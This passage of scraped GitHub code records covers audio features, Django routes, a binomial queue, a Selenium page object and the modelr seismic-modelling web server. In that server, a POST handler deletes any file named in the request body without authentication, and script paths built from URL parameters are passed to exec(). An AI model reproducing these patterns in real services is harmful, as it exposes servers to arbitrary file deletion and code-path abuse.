create feature table\ndef create_features_table(table_file_name):\n with open(table_file_name, 'w', encoding='cp1251', newline ='') as file:\n writer = csv.writer(file, delimiter=',')\n h = get_headers(1, include_dirs=True)\n writer.writerow(h)\n for directory, _, filenames in os.walk(\"./data/Sounds-dataset/\"):\n for filename in filenames:\n row = [directory]\n row.append(filename)\n y, sr = librosa.load(os.path.join(directory, filename), mono=True)\n row.extend(get_features(y, 
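mean_confidence_interval in the record above forms a Student-t interval: the half-width h is the standard error of the mean times the t critical value at (1 + confidence)/2 with n - 1 degrees of freedom. A self-contained check on toy numbers (values assumed for illustration):

import numpy as np
from scipy.stats import sem, t

data = np.array([10.1, 9.8, 10.3, 10.0, 9.9])
n = len(data)
mean = data.mean()
# Half-width: standard error of the mean times the t critical value.
h = sem(data) * t.ppf((1 + 0.95) / 2.0, n - 1)
print(mean, mean - h, mean + h)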
sr))\n writer.writerow(row)\n\n\n#execute once to create dataset\ndef feature_table_to_dataset(dataset_file_name, table_file_name):\n with open(dataset_file_name, 'w', encoding='cp1251', newline ='') as file:\n writer = csv.writer(file, delimiter=',')\n h = get_headers()\n h.append(\"label\")\n writer.writerow(h)\n features = pd.read_csv(table_file_name, encoding='cp1251')\n for f1 in features.values:\n for f2 in features.values:\n dir1, dir2 = f1[0], f2[0]\n fname1, fname2 = f1[1], f2[1]\n row = []\n row.extend([fname1, fname2])\n row.extend(f1[2:])\n row.extend(f2[2:])\n label = round(100 - mean_absolute_percentage_error(f1[2:], f2[2:]))\n row.append(label)\n writer.writerow(row)","repo_name":"DanielTkachenko/SoundRecognition","sub_path":"my_dataset.py","file_name":"my_dataset.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33409562176","text":"from django import template\n\nregister = template.Library()\n\n\n@register.filter\ndef split_in_groups(items, n):\n try:\n n = int(n)\n except (ValueError, TypeError):\n return [items]\n\n groups = []\n\n while len(items) != 0:\n next_group = items[:n]\n groups.append(next_group)\n\n items = items[n:]\n\n return groups\n","repo_name":"rizplate/Loki","sub_path":"loki/base_app/templatetags/list_utils.py","file_name":"list_utils.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23942992253","text":"import random\nimport copy\n\nclass BinomialQueue:\n\n\tclass Node:\n\t\tdef __init__(self, data):\n\t\t\tself.data = data\n\t\t\tself.children = []\n\n\tclass BinomialTree:\n\t\tdef __init__(self, root, k, has_priortiy):\n\t\t\tself.root = root\n\t\t\tself.k = k\n\t\t\tself.has_priortiy = has_priortiy\n\n\t\tdef merge(self, other):\n\t\t\tif (self.k != other.k or not self.root or not other.root):\n\t\t\t\traise Exception(\"Error merging binomial trees because of None roots or height differences\")\n\n\t\t\tif (self.has_priortiy(self.root.data, other.root.data)):\n\t\t\t\tself.root.children.append(other.root)\n\t\t\telse:\n\t\t\t\tother_cpy = copy.copy(other)\n\t\t\t\tother_cpy.root.children.append(self.root)\n\t\t\t\tself.root = other_cpy.root\n\t\t\tself.k += 1\n\n\t\tdef get_top(self):\n\t\t\tif (not self.root):\n\t\t\t\traise Exception(\"cannot get top of empty tree\")\n\t\t\treturn self.root.data\n\n\t\tdef __repr__(self):\n\t\t\tif (not self.root):\n\t\t\t\treturn \"[]\"\n\n\t\t\tq = [self.root]\n\n\t\t\tres = \"[\"\n\n\t\t\twhile (q):\n\t\t\t\tx = q.pop(0)\n\t\t\t\tif (not x):\n\t\t\t\t\tres += \"None, \"\n\n\t\t\t\telse:\n\t\t\t\t\tres += \"{}, \".format(str(x.data))\n\t\t\t\t\tif (len(x.children) > 0):\n\t\t\t\t\t\tfor child in x.children:\n\t\t\t\t\t\t\tq.append(child)\n\n\t\t\tres = res[:-2] + \"]\"\n\t\t\treturn res\n\n\n\n\n\tdef __init__(self, has_priortiy=None, lone_tree=None):\n\t\tself.size = 0\n\t\tif (not lone_tree):\n\t\t\tself.queue = [] # sorted list (by height) of binomial trees\n\t\telse:\n\t\t\tself.queue = [lone_tree]\n\t\t\tself.size += pow(2,lone_tree.k)\n\t\tself.has_priortiy = has_priortiy\n\t\tself.hash = {}\n\n\tdef set_queue(self, q):\n\t\tself.queue = q\n\n\tdef contains(self, data):\n\t\treturn data in self.hash\n\n\tdef insert(self, data):\n\t\tif (data in self.hash):\n\t\t\traise Exception(\"cannot insert {} because it already exists\".format(data))\n\n\t\tself.hash[data] = True\n\t\tone_node_queue = 
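The split_in_groups template filter in the record above chunks a list into groups of n by repeated slicing; a quick standalone illustration of the expected output (plain Python, no Django needed):

def split_in_groups(items, n):
    groups = []
    while items:                 # same repeated-slicing idea as the filter
        groups.append(items[:n])
        items = items[n:]
    return groups

print(split_in_groups([1, 2, 3, 4, 5], 2))  # [[1, 2], [3, 4], [5]]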
BinomialQueue(lone_tree=self.BinomialTree(self.Node(data), 0, self.has_priortiy))\n\t\tself.merge(one_node_queue)\n\t\tself.size += 1\n\n\n\tdef is_valid_queue(self):\n\t\t# make sure the queue is in sorted order\n\t\tfor i in range(0, len(self.queue) - 1):\n\t\t\tif (self.queue[i].k > self.queue[i+1].k):\n\t\t\t\treturn False\n\t\treturn True\n\n\tdef remove_min(self):\n\t\t\n\t\tdef smallest_idx():\n\t\t\tif (len(self.queue) == 0):\n\t\t\t\traise Exception(\"Cannot get smallest idx from empty queue\")\n\t\t\t\"\"\"\n\t\t\tget the index in the queue containing the smallest element\n\t\t\t\"min\" assuming small elements have priority\n\t\t\t\"\"\"\n\t\t\tmin_val = self.queue[0].get_top()\n\t\t\tmin_idx = 0\n\t\t\tfor i in range(1, len(self.queue)):\n\t\t\t\tif (self.has_priortiy(self.queue[i].get_top(), min_val)):\n\t\t\t\t\tmin_val = self.queue[i].get_top()\n\t\t\t\t\tmin_idx = i\n\n\t\t\treturn min_idx\n\n\t\tdef get_children(tree):\n\t\t\t\"\"\"\n\t\t\tget all the children of this tree\n\t\t\t(they should be in sorted order)\n\t\t\t\"\"\"\n\t\t\tqueue_children = []\n\t\t\troots_children = tree.root.children\n\t\t\tfor i in range(len(roots_children)):\n\t\t\t\tqueue_children.append(self.BinomialTree(roots_children[i], i, self.has_priortiy))\n\t\t\treturn queue_children\n\n\t\tif (len(self.queue) == 0):\n\t\t\traise Exception(\"cannot remove min on empty queue\")\n\n\t\tmin_idx = smallest_idx()\n\t\tpopped_tree = self.queue.pop(min_idx) # remove the tree\n\t\tval = popped_tree.get_top()\n\t\tself.hash.pop(val) # remove from hash\n\t\tto_merge = BinomialQueue(has_priortiy=self.has_priortiy)\n\t\tto_merge.set_queue(get_children(popped_tree)) # add popped's node's children\n\t\tself.merge(to_merge)\n\t\tself.size -= 1\n\t\treturn val\n\n\tdef merge(self, other):\n\t\tq3 = [] # the merged queue\n\t\tq1 = self.queue\n\t\tq2 = other.queue\n\n\t\tdef helper(idx1, idx2):\n\t\t\tnonlocal q1, q2, q3\n\n\t\t\t# potentially merge with q3[-1]\n\t\t\tdef merge_tree(tree):\n\t\t\t\tnonlocal q3\n\t\t\t\tif (q3 != [] and q3[-1].k == tree.k):\n\t\t\t\t\ttree.merge(q3.pop(-1))\n\t\t\t\tq3.append(tree)\n\n\n\t\t\t# mo more trees to merge\n\t\t\tif (idx1 >= len(q1) and idx2 >= len(q2)):\n\t\t\t\treturn\n\n\t\t\t# trees left in q1\n\t\t\telif (idx2 >= len(q2)):\n\t\t\t\tmerge_tree(q1[idx1])\n\t\t\t\tidx1 += 1\n\n\t\t\t# trees left in q2\n\t\t\telif (idx1 >= len(q1)):\n\t\t\t\tmerge_tree(q2[idx2])\n\t\t\t\tidx2 += 1\n\n\t\t\t# trees left in both\n\t\t\telse:\n\t\t\t\t# if the trees have the same height, merge them together\n\t\t\t\tif (q1[idx1].k == q2[idx2].k):\n\t\t\t\t\tq1[idx1].merge(q2[idx2])\n\t\t\t\t\tq3.append(q1[idx1])\n\t\t\t\t\tidx1 += 1\n\t\t\t\t\tidx2 += 1\n\t\t\t\telse:\n\t\t\t\t\tif (q1[idx1].k < q2[idx2].k):\n\t\t\t\t\t\tsmall_tree = q1[idx1]\n\t\t\t\t\t\tidx1 += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tsmall_tree = q2[idx2]\n\t\t\t\t\t\tidx2 += 1\n\n\t\t\t\t\tmerge_tree(small_tree)\n\n\t\t\thelper(idx1, idx2)\n\n\t\thelper(0, 0)\n\t\tself.queue = q3\n\n\n\tdef __len__(self):\n\t\treturn self.size\n\n\t\"\"\"\n\tprint the level order traversal of each of the binomial trees\n\t\"\"\"\n\tdef __repr__(self):\n\t\tres = \"\"\n\t\tfor tree in self.queue:\n\t\t\tres += tree.__repr__()\n\t\t\tres += \"\\n\"\n\t\treturn res\n\n\nif __name__ == \"__main__\":\n\tpriority = lambda x, y: x < y\n\tbq = BinomialQueue(priority)\n\n\n\tnums = list(range(0, 10000))\n\tfor i in range(1000):\n\t\tnum = nums.pop(random.randint(0, len(nums) - 1))\n\t\tbq.insert(num)\n\t\tprint(\"inserted 
{}\".format(num))\n\n\tprint(bq)\n\tprint(len(bq.queue))\n\n\t# while (len(bq) > 0):\n\t# \tval = bq.remove_min()\n\t# \tprint(\"Removed {}\".format(val))\n\n\n\n\n\n\n\n","repo_name":"ovifrisch/Python-Data-Structures","sub_path":"heaps/binomial_queue.py","file_name":"binomial_queue.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28269623224","text":"from django.urls import path, include\n\nfrom . import views\n\nfrom django.contrib.auth import views as auth_views\n\napp_name = 'moticom'\nurlpatterns = [\n path('', views.TopView, name='main'),\n #path('', views.TopView.as_view(), name='main'),\n path('index', views.IndexView.as_view(), name='index'),\n path('board', views.BoardView.as_view(), name='board'),\n path('genre_display', views.genre_display, name='genre_display'),\n path('report', views.ReportView.as_view(), name='report'),\n path('genre', views.GenreView.as_view(), name='genre'),\n path('complete', views.create_post, name='complete'),\n path('profile', views.ProfileView.as_view(), name='profile'),\n path('complaints', views.ComplaintsView.as_view(), name='complaints'),\n path('help', views.HelpView.as_view(), name='help'),\n path('accounts/', include('django.contrib.auth.urls')),\n #path('accounts/password_change/', auth_views.PasswordChangeView.as_view(template_name='registration/password_change.html'), name='password_change_form'), # 追加\n #path('accounts/password_change/done', auth_views.PasswordChangeDoneView.as_view(template_name='registration/password_change_finish.html'), name='password_change_done'), \n \n #管理者用ページ↓\n path('admin', views.AdminView, name='admin'),\n path('analysis', views.AnalysisView.as_view(), name='analysis'),\n path('admin_board', views.Admin_BoardView, name='admin_board'),\n path('admin_genre_display', views.admin_genre_display, name='admin_genre_display'),\n path('delete_post', views.DeletePost, name='delete_post'),\n path('delete_comment', views.DeleteComment, name='delete_comment'),\n path('user', views.UserView.as_view(), name='user'),\n path('layout', views.LayoutView.as_view(), name='layout'),\n path('genre_manage', views.Genre_ManageView.as_view(), name='genre_manage'),\n path('add_genre', views.create_genre, name='add_genre'),\n path('delete_genre', views.delete_genre, name='delete_genre'),\n path('filter', views.FilterView.as_view(), name='filter'),\n path('delete_NGword', views.delete_NGword, name='delete_NGword'),\n path('sorting', views.sorting, name='sorting'),\n path('linking', views.LinkingView.as_view(), name='linking'),\n path('switch_link', views.Switch_link, name='switch_link'),\n path('DeleteKeyWord', views.DeleteKeyWord, name='DeleteKeyWord'),\n path('cm_create', views.Cm_CreateView.as_view(), name='cm_create'),\n path('create', views.CreativeControlMeasureView.as_view(), name='create'),#正しいところに移ったらcm_createに修正\n path('/update', views.UpdateControlMeasureView.as_view(), name='update'), #正しいところに移ったらcm_updateに修正\n path('/delete', views.DeleteControlMeasureView.as_view(), name='delete'), #正しいところに移ったらcm_deleteに修正\n path('sorting', views.sorting, name='sorting'),\n path('linking', views.LinkingView.as_view(), name='linking'),\n path('search', views.Search, name='search'),\n path('signup', views.SignUp.as_view(), name='signup'),\n path('signup/finish', views.SignUpFinish.as_view(), name='signup_finish'),\n ]\n\n\"\"\"\n変更点\n・コメントアウトされているものを下に移動\n\"\"\"\n\n\"\"\"\n #path('save_report', views.save_report, name='save_report'),\n 
#path('sorting', views.SortingView.as_view(), name='sorting'),\n #path('login/', views.Login, name='login'),\n #path('logout', views.Logout.as_view(), name='logout'),\n #path('password_change', views.PasswordChange.as_view(), name='password_change'), #パスワード変更\n #path('password_change/done', views.PasswordChangeDone.as_view(), name='password_change_done'), #パスワード完了\n #path('password_change/', views.PasswordChange.as_view(), name='password_change'),\n #path('password_change/done/', views.PasswordChangeDone.as_view(), name='password_change_done'),\n #path('change_password/', auth_views.PasswordChangeView.as_view(template_name='moticom/password_change.html', success_url = '/'),name='password_change'),\n #path('password_change_form', auth_views.PasswordChangeView.as_view(template_name='registration/password_change_form.html'), name='password_change_form'), # 追加\n #path('password_change_done', auth_views.PasswordChangeDoneView.as_view(template_name='registration/password_change_done.html'), name='password_change_done'), # 追加\n \n\"\"\"","repo_name":"Ksxr/2021PBL","sub_path":"mysite/moticom/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40280930523","text":"from jinja2 import Environment, PackageLoader\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom argparse import ArgumentParser\nfrom os import listdir\nfrom os.path import isfile, join, dirname\n\nimport os\n\nfrom urllib.parse import urlparse, parse_qs\nfrom modelr.web.urlargparse import SendHelp, ArgumentError, \\\n URLArgumentParser\nimport traceback\nimport json\nimport multiprocessing as mp\nimport ssl\nimport socket\nfrom socketserver import ThreadingMixIn\n\nfrom modelr.EarthModel import EarthModel\nfrom modelr.SeismicModel import SeismicModel\nfrom modelr.ModelrPlot import ModelrPlot\nfrom modelr.ForwardModel import ForwardModel\nfrom modelr.ModelrScript import ModelrScript\n\nimport base64\n\n# import cProfile as prof\n\n# -*- coding: utf-8 -*-\n'''\n===================\nmodelr.web.server\n===================\n\nMain program to start a web server.\n\nCreated on Apr 30, 2012\n\n@author: sean\n'''\n\nsocket.setdefaulttimeout(6)\n\n\nclass ThreadedHTTPServer(ThreadingMixIn, HTTPServer):\n \"\"\" This class allows to handle requests in separated threads.\n No further content needed, don't touch this. 
\"\"\"\n\n\nclass MyHandler(BaseHTTPRequestHandler):\n '''\n Handles a single request.\n '''\n\n def terminate(self):\n '''\n shut down the application\n '''\n # \"terminate requested\"\n\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n self.wfile.write(\"Shutting down...\".encode())\n\n self.server._BaseServer__shutdown_request = True\n\n def eval_script(self, script, script_type):\n '''\n Get the the namespace for a script.\n '''\n # If no script was passed, then tell the user\n if not script or len(script) != 1:\n # \"++++++++++++++++++++++++++++++++++++\"\n self.send_script_error(\"argument 'script' was omitted \" +\n \"or malformed (got %r)\" % (script))\n return\n\n if script_type is None:\n # \"++++++++++++++++++++++++++++++++++++\"\n self.send_script_error(\"argument 'script_type' was omitted \"\n \"or malformed (got %r)\" % (script))\n return\n\n # Otherwise, run the script\n dirn = dirname(__file__)\n script_path = join(dirn, 'scripts', script_type[0], script[0])\n\n if not isfile(script_path):\n self.send_script_error(\"argument 'script' '%r' was is not a \"\n \"valid script \" % (script[0],))\n return\n\n namespace = {}\n with open(script_path, 'r') as fd:\n exec(fd.read(), namespace)\n\n return namespace\n\n def do_OPTIONS(self):\n self.send_response(200)\n self.send_header('Allow', 'GET, OPTIONS')\n self.send_header('Access-Control-Allow-Origin', '*')\n self.send_header('Access-Control-Allow-Headers',\n 'X-Request, X-Requested-With')\n self.send_header('Content-Length', '0')\n self.end_headers()\n\n def do_GET(self):\n '''\n handle a get request.\n '''\n # \"my do GET\"\n try:\n uri = urlparse(self.path)\n parameters = parse_qs(uri.query)\n\n # super dangerous. commenting out\n # if uri.path == '/terminate':\n # self.terminate()\n # return\n\n # returns the script help\n if uri.path == '/script_help.json':\n\n script = parameters.pop('script', None)\n script_type = parameters.pop('type', None)\n\n namespace = self.eval_script(script, script_type)\n if namespace is None:\n self.send_response(400)\n self.end_headers()\n\n self.send_response(200)\n self.send_header('Access-Control-Allow-Origin', '*')\n self.send_header('Access-Control-Allow-Headers',\n 'X-Request, X-Requested-With')\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n\n script_main = namespace['run_script']\n add_arguments = namespace['add_arguments']\n short_description = namespace.get('short_description',\n 'No description')\n\n parser = URLArgumentParser(short_description)\n add_arguments(parser)\n\n self.wfile.write(parser.json_data)\n\n return\n\n # list the available scripts\n if uri.path == '/available_scripts.json':\n self.send_response(200)\n self.send_header('Access-Control-Allow-Origin', '*')\n self.send_header('Access-Control-Allow-Headers',\n 'X-Request, X-Requested-With')\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n\n script_type = parameters.pop('type', None)\n\n all_scripts = self.get_available_scripts(script_type)\n\n data = json.dumps(all_scripts)\n\n self.wfile.write(data.encode())\n return\n\n # Outputs a base64 image and an auxillary json structure\n elif uri.path == '/plot.json':\n\n parameters = parse_qs(uri.query)\n script = parameters.pop(\"script\", None)\n script_type = parameters.pop(\"type\", None)\n\n # Get the namespace\n namespace = self.eval_script(script, script_type)\n if namespace is None:\n return\n\n plot_generator = ModelrScript(parameters, namespace)\n\n # Run in 
sub-process to prevent memory hogging\n # p = mp.Process(target=self.run_script_jpg_json,\n # args=(plot_generator,))\n # p.start()\n # p.join()\n self.run_script_jpg_json(plot_generator)\n\n # Outputs json data\n elif uri.path == '/data.json':\n parameters = parse_qs(uri.query)\n script = parameters.pop(\"script\", None)\n script_type = parameters.pop(\"type\", None)\n\n print(\"running\", script, script_type)\n payload = json.loads(parameters.pop(\"payload\")[0])\n\n # Get the namespace\n namespace = self.eval_script(script, script_type)\n if namespace is None:\n return\n\n # payload = json.parse(parameters[\"payload\"])\n script_main = namespace[\"run_script\"]\n\n # Run in sub-process to prevent memory hogging\n # p = mp.Process(target=self.run_script_json,\n # args=(script_main, payload))\n # p.start()\n # p.join()\n self.run_script_json(script_main, payload)\n\n # Output only an image\n elif uri.path == '/plot.jpeg':\n script = parameters.pop('script', None)\n script_type = parameters.pop('type', None)\n namespace = self.eval_script(script, script_type)\n if namespace is None:\n return\n\n script_main = namespace['run_script']\n add_arguments = namespace['add_arguments']\n short_description = namespace.get('short_description',\n 'No description')\n # \"parameters\", parameters\n # p = mp.Process(target=self.run_script_jpg,\n # args=(script[0], script_main,\n # add_arguments, short_description,\n # parameters))\n # p.start()\n # p.join()\n self.run_script_jpg(script[0], script_main,\n add_arguments, short_description,\n parameters)\n\n else:\n self.send_error(404, 'File Not Found: %s' % self.path)\n return\n\n except Exception:\n self.send_response(400)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n tb = traceback.format_exc().splitlines()\n\n tb = '
<br>\\n'.join(tb)\n\n            # NOTE: the markup in the writes below was lost when this file was scraped; minimal tags restored as a guess.\n            self.wfile.write('Python Error<br>'.encode())\n            self.wfile.write('<pre>'.encode())\n            self.wfile.write(tb.encode())\n            self.wfile.write('</pre>'.encode())\n            raise\n\n    def run_script_jpg(self, script, script_main, add_arguments,\n                       short_description, parameters):\n        '''\n        Run a script that returns a jpeg\n\n        :param script_main: the main method of the script\n        :param add_arguments: populate an argument parser\n        :param short_description: a short description of the script\n        :param parameters: the parameters from the get request\n        '''\n        parser = URLArgumentParser(short_description)\n        add_arguments(parser)\n        try:\n            args = parser.parse_params(parameters)\n        except SendHelp:\n            self.send_response(200)\n            self.send_header('Content-type', 'text/html')\n            self.end_headers()\n\n            template = self.server.jenv.get_template('ScriptHelp.html')\n\n            # parameters\n            html = template.render(script=script, parser=parser,\n                                   parameters=parameters)\n            self.wfile.write(html.encode())\n            return\n        except ArgumentError as err:\n            self.send_response(400)\n            self.send_header('Content-type', 'text/html')\n            self.end_headers()\n\n            self.wfile.write(('<h1>Error: %s</h1>
'\n % (err.args[0],)).encode())\n self.wfile.write(parser.help_html.encode())\n return\n\n jpeg_data = script_main(args)[0]\n\n self.send_response(200)\n self.send_header('Content-type', 'image/png')\n self.end_headers()\n\n self.wfile.write(jpeg_data)\n\n del jpeg_data\n\n def run_script_json(self, script, payload):\n\n self.send_response(200)\n self.send_header('Access-Control-Allow-Origin', '*')\n self.send_header('Access-Control-Allow-Headers',\n 'X-Request, X-Requested-With')\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n\n data = script(payload)\n\n # Write response\n self.wfile.write(json.dumps(data).encode())\n\n def run_script_jpg_json(self, plot_generator):\n \"\"\"\n Runs a script and writes out a JSON response with\n a base64 encoded jpeg and json metadata\n \"\"\"\n\n # Run the script\n image_data, metadata = plot_generator.go()\n\n # Encode for http send\n encoded_image = base64.b64encode(image_data)\n\n # convert to json\n data = json.dumps({'data': encoded_image,\n 'metadata': metadata})\n\n self.send_response(200)\n self.send_header('Access-Control-Allow-Origin', '*')\n self.send_header('Access-Control-Allow-Headers',\n 'X-Request, X-Requested-With')\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n\n # Write response\n self.wfile.write(data.encode())\n\n def get_available_scripts(self, script_type=None):\n '''\n Returns a list of all the scripts in the scripts directory.\n '''\n\n if script_type is None:\n # \"++++++++++++++++++++++++++++++++++++\"\n return\n\n scripts_dir = join(dirname(__file__), 'scripts',\n script_type[0])\n\n available_scripts = []\n for script in listdir(scripts_dir):\n try:\n if script == '__init__.py':\n continue\n elif not script.endswith('.py'):\n continue\n\n namespace = {}\n with open(join(scripts_dir, script), 'r') as fd:\n exec(fd.read(), namespace)\n\n\n short_doc = namespace.get('short_description',\n 'No doc')\n # script, namespace\n available_scripts.append((script, short_doc))\n except Exception as e:\n print(script, e)\n\n return available_scripts\n\n def send_script_error(self, msg):\n '''\n Send an error related to the script.\n '''\n\n template = self.server.jenv.get_template('ScriptError.html')\n\n self.send_response(400)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n scripts = self.get_available_scripts(['scenario'])\n html = template.render(msg=msg, available_scripts=scripts)\n self.wfile.write(html.encode())\n\n def do_POST(self):\n \"\"\"\n Calls that access datafiles\n \"\"\"\n uri = urlparse(self.path)\n\n if uri.path == '/forward_model.json':\n\n content_len = int(self.headers.getheader('content-length'))\n raw_json = self.rfile.read(content_len)\n\n parameters = json.loads(raw_json)\n\n earth_script = parameters[\"earth_model\"].pop(\"script\",\n None)\n earth_namespace = self.eval_script([earth_script],\n ['earth'])\n\n earth_model = EarthModel(parameters[\"earth_model\"],\n earth_namespace)\n\n seismic_script = parameters[\"seismic_model\"].pop(\"script\",\n None)\n\n seismic_namespace = self.eval_script([seismic_script],\n ['seismic'])\n\n seismic_model = SeismicModel(parameters[\"seismic_model\"][\"args\"],\n seismic_namespace)\n\n plot_script = parameters[\"plots\"].pop(\"script\", None)\n plot_namespace = self.eval_script([plot_script],\n ['plots'])\n\n plots = ModelrPlot(parameters[\"plots\"][\"args\"],\n plot_namespace)\n\n forward_model = ForwardModel(earth_model, seismic_model,\n plots)\n\n # 
prof.runctx('self.run_json(forward_model)',\n # {'self': self, 'forward_model':forward_model},\n # {},\n # 'profile.test')\n\n # p = mp.Process(target=self.run_script_jpg_json,\n # args=(forward_model,))\n\n # p.start()\n # p.join()\n self.run_script_jpg_json(forward_model)\n\n return\n\n elif (uri.path == '/delete_model'):\n\n self.send_response(200)\n self.send_header(\"Access-Control-Allow-Origin\", \"*\")\n self.end_headers()\n\n content_len = int(self.headers.getheader('content-length'))\n raw_json = self.rfile.read(content_len)\n\n parameters = json.loads(raw_json)\n os.remove(str(parameters[\"filename\"]))\n\n return\n\n self.send_error(404, 'Post request not supportd yet: %s'\n % self.path)\n\n# Locations of the PEM files for SSL\n# If this doesn't work, an alternative would be to store the\n# full chain including the private key, as described here:\n# http://www.digicert.com/ssl-support/pem-ssl-creation.htm\n# CERTFILE = '/etc/ssl/modelr/public.pem'\n# KEYFILE = '/etc/ssl/private/private.pem'\nCERTFILE = 'cert.pem'\nKEYFILE = 'key.pem'\n\n\ndef main():\n '''\n Main method starts a server and exits on\n '''\n parser = ArgumentParser(description=__doc__)\n\n parser.add_argument('--host', type=str, default='')\n parser.add_argument('-p', '--port', type=int, default=80)\n\n parser.add_argument('--local', type=bool, default=False)\n args = parser.parse_args()\n try:\n # This provides SSL, serving over HTTPS.\n # This approach will not allow service over HTTP.\n # I think we should allow both, since there is no\n # real reason for modelr-server to be secure.\n # I don't know if we need to check the certificate\n # on the client side too, or if doing it this way\n # will satisfy the browser and that's enough.\n\n if not args.local:\n server = ThreadedHTTPServer((args.host, args.port), MyHandler)\n\n # Force TLS v1.2. 
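Because main() above wraps the listening socket with a self-signed certificate, a client of the JSON endpoints has to opt out of verification; a hedged sketch (the host is hypothetical — the endpoint, the 'type' query parameter and the 'scenario' script type come from the handler code):

import requests

# Hypothetical address; skip verification because the cert is self-signed.
r = requests.get("https://localhost/available_scripts.json",
                 params={"type": "scenario"},
                 verify=False)
print(r.json())  # list of (script, short_description) pairs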
Not important per se, but the\n # main point is to disallow SSL v3, which is insecure.\n # I think we're supposed to load certs to the context,\n # but if this doesn't work we can put that bit back\n # in the socket wrapping part.\n context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)\n context.load_cert_chain(certfile=CERTFILE, keyfile=KEYFILE)\n\n server.socket = context.wrap_socket(server.socket,\n server_side=True)\n server.socket.settimeout(0.0)\n\n else:\n server = HTTPServer((args.host, args.port), MyHandler)\n\n server.jenv = Environment(loader=PackageLoader('modelr',\n 'web/templates'))\n\n print('started httpserver...')\n server.serve_forever()\n\n except KeyboardInterrupt:\n print('^C received, shutting down server')\n server.socket.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"agilescientific/modelr","sub_path":"modelr/web/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":17789,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"22952117179","text":"def length_of_longest_substring(string: str) -> int:\n if not string:\n return 0 # if the length of the string is 0, return 0 as there are no substrings\n\n # set longest substring to 1 as default value for now\n longest_substring = 1\n # set window start and end to the start of the string\n window_start, window_end = 0, 0\n\n # slowly increase the end of the window until it has reached the length of the string\n # once it is the length of the string\n while window_end < len(string):\n # create a substring using list slicing which is the size of the window\n substring = string[window_start : window_end + 1]\n # check that the substring has no duplicate characters\n if len(set(list(substring))) == len(substring):\n # set longest_substring to current length if it is higher than the previous longest substring\n longest_substring = max(longest_substring, window_end - window_start + 1)\n # increase the window length by one to test if that substring will contain duplicates\n window_end += 1\n continue\n # increase the start of the window by one\n window_start += 1\n return longest_substring\n","repo_name":"Code-Club-OSC/solutions-and-examples","sub_path":"term_3/longest_substr.py","file_name":"longest_substr.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"6037959517","text":"import time\n\ndef t_time():\n start_time = time.time()\n time.sleep(0.1)\n return (time.time() - start_time)\n\ndef clock():\n start_clock = time.clock()\n time.sleep(0.1)\n return (time.clock() - start_clock)\n\ncount_time = 0\ncount_clock = 0\n\nfor i in range(1,10):\n count_time += t_time()\n count_clock += clock()\n\nprint(\"time =\",count_time)\nprint(\"clock =\",count_clock)","repo_name":"ViktoricaN/New","sub_path":"Time.py","file_name":"Time.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14106036034","text":"class Solution:\n def subarraySum(self, nums: List[int], k: int) -> int:\n dic = {}\n total = 0\n ans = 0\n for ele in nums:\n total += ele\n if total == k: ans += 1\n if total - k in dic:\n ans += dic.get(total - k)\n if total in dic:\n dic[total] = dic.get(total) + 1\n else:\n dic[total] = 1\n return 
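The length_of_longest_substring record above rebuilds a set for every window, which is quadratic; the standard linear variant keeps one set and only advances the left edge on a duplicate. A sketch of that version:

def length_of_longest_substring(s: str) -> int:
    seen = set()
    left = best = 0
    for right, ch in enumerate(s):
        while ch in seen:        # shrink from the left until ch is unique
            seen.remove(s[left])
            left += 1
        seen.add(ch)
        best = max(best, right - left + 1)
    return best

print(length_of_longest_substring("abcabcbb"))  # 3 ("abc")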
ans","repo_name":"Sol-cito/LeetCoding","sub_path":"560-subarray-sum-equals-k/560-subarray-sum-equals-k.py","file_name":"560-subarray-sum-equals-k.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34453112712","text":"from BasePage import BasePage\nfrom BasePage import IncorrectPageException\nfrom oig.Constants import TT_Constants\nfrom oig.UIMap import OrientationWhistleblowerPageMap\n\n\n#this is a page object for the New Hire Orientation - Whistleblower Protection info page\n#accessed after clicking the Whistleblower Protection link \nclass OrientationWhistleblowerPage(BasePage):\n\n def __init__(self, driver):\n super(OrientationWhistleblowerPage, self).__init__(driver)\n \n def _verify_page(self):\n try:\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationWhistleblowerBannerXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationWelcomeLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationBeforeReportLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationFirstDayLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationNoFearLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n 